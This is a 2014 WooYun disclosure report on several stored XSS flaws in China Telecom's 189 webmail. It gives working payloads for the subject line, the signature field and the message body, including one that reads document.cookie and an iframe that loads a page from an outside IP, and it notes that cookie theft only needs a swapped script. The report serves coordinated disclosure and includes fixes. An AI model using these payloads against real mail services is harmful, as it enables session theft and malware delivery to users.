当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-062029

漏洞标题:中国电信189邮箱多处存储型XSS漏洞

相关厂商:中国电信

漏洞作者: nextdoor

提交时间:2014-05-28 18:22

修复时间:2014-07-12 18:22

公开时间:2014-07-12 18:22

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-05-28: 细节已通知厂商并且等待厂商处理中
2014-06-01: 厂商已经确认,细节仅向厂商公开
2014-06-11: 细节向核心白帽子及相关领域专家公开
2014-06-21: 细节向普通白帽子公开
2014-07-01: 细节向实习白帽子公开
2014-07-12: 细节向公众公开

简要描述:

中国电信189邮箱多处存储型XSS漏洞

详细说明:

中国电信189邮箱多处存储型的跨站漏洞
描述:
电信189邮箱在过滤on事件(仅仅在标签中才过滤,不在标签的不过滤),
还有javascript,data和expssion等标签,很难绕过,很头疼。
A.先来一个mxss漏洞
这样原因是在正文中过滤了,在标题中未过滤,且标题的过滤可以被轻松绕过
利用代码

<img src=1 onerror=alert(888) >
&lt;svg onload="alert(document.cookie)"></svg&gt;
aaaaaa&lt;i onmouseover=alert(1)&gt;aaaa


如图所示

d1PNG.PNG


打开邮件漏洞直接触发

a3.PNG


其他标签就可使用<div><i>和<svg>
这个i标签必须回复转发下且鼠标在数字上触发,

a4.PNG


a5.PNG


svg下自动触发

a6.PNG


b.这个漏洞是在签名处,由于在插入链接时可以闭合<a>标签,从而插入<iframe>标签
利用代码

<IFRAME SRC="javascript:alert(27);"></IFRAME>


测试过程

123.PNG


漏洞回复,转发时触发

6.PNG


代码代码执行

a10.PNG


c.正文和快速回复处
它们未过滤iframe这个危险的标签。
且iframe只有进入一个外部的html文件就可以了,这个还可以挂马,危害很大
利用代码

<IFRAME SRC="http://182.124.1.1:8088/2.html"></IFRAME>


1.PNG


漏洞回复转发触发

a9.PNG


代码执行

a11.PNG


快速回复中可以插入iframe,测试有效,不在贴图证明
总结:过滤时要完全啊。盗取cookie的过程就是把执行的代码换成我们的js代码,
不在详述。

漏洞证明:

漏洞证明

a9.PNG

修复方案:

漏洞防御:
1.对于xmss漏洞,正文中怎样过滤,标题中也怎样过滤
2.对签名处,正文处怎样过滤,签名处怎样过滤
3.正文和回复中,对iframe标签过滤

版权声明:转载请注明来源 nextdoor@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2014-06-01 23:28

厂商回复:

CNVD确认并复现所述情况,转由CNCERT协调中国电信集团公司通报处置。

最新状态:

暂无